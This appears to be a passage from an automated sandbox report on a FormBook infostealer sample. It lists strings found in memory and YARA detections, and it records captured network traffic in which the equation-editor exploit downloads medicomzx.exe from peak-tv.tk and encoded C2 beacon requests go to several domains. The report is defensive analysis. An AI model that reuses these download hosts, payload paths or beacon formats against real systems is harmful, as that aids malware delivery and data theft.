Source: explorer.exe, 00000006.00000000.512405771.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.fatcow.com/free-icons/
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.gnome.org/
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.440264706.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.450417364.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp01l
Source: explorer.exe, 00000006.00000000.513738844.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.427765876.0000000003DF8000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.449038733.0000000003DF8000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441178854.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.450277744.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.512214030.00000000002C7000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
Source: explorer.exe, 00000006.00000000.431913656.0000000008412000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.445007299.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.425426791.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.443623492.0000000008412000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: http://www.small-icons.com/packs/16x16-free-application-icons.htm
Source: explorer.exe, 00000006.00000000.440108961.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.440603406.0000000003D90000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.451349958.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443476567.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.434207540.000000000031D000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.445067687.000000000031D000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.450373871.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430728798.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.441314689.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514860954.00000000045D6000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr
Source: medicomsh78694.exe String found in binary or memory: https://github.com/proviq/lusrmgr/
Source: medicomsh78694.exe, 00000004.00000002.423480427.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000004.00000000.408501370.0000000000AD2000.00000020.00020000.sdmp, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://github.com/proviq/lusrmgr/Chttps://github.com/proviq/lusrmgr
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: medicomsh78694.exe, medicomsh78694.exe, 00000005.00000000.419120807.0000000000AD2000.00000020.00020000.sdmp String found in binary or memory: https://visualpharm.com/must_have_icon_set/
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.433735191.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.444882929.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.512104009.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8CA50CAD-0168-40C5-9DE5-3A2EB92A8144}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: peak-tv.tk
Source: global traffic HTTP traffic detected: GET /medicomzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: peak-tv.tkConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1Host: www.prestigiousuniforms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1Host: www.muzicalbox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1Host: www.extraordinarymiracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1Host: www.realstakepool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe Jump to dropped file
.NET source code contains very large strings
Source: medicomzx[1].exe.2.dr, MainForm.cs Long String: Length: 22528
Source: medicomsh78694.exe.2.dr, MainForm.cs Long String: Length: 22528
Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs Long String: Length: 22528
Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
Yara signature match
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Document has an unknown application name
Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0037F108 4_2_0037F108
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_003706CC 4_2_003706CC
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004414F0 4_2_004414F0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00441D51 4_2_00441D51
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445E40 4_2_00445E40
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00442752 4_2_00442752
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445450 4_2_00445450
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445C78 4_2_00445C78
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445808 4_2_00445808
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00449820 4_2_00449820
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004468C8 4_2_004468C8
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004404E7 4_2_004404E7
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445C88 4_2_00445C88
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004414BD 4_2_004414BD
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0044B588 4_2_0044B588
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004445A0 4_2_004445A0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004445B0 4_2_004445B0
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00445A60 4_2_00445A60
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00443668 4_2_00443668
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_0044CE00 4_2_0044CE00
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_004457FA 4_2_004457FA
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 4_2_00AD79AE 4_2_00AD79AE
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401026 5_2_00401026
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041D034 5_2_0041D034
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C0C7 5_2_0041C0C7
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041C969 5_2_0041C969
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_00401174 5_2_00401174
Source: C:\Users\user\AppData\Roaming\medicomsh78694.exe Code function: 5_2_0041B93E 5_2_0041B93E
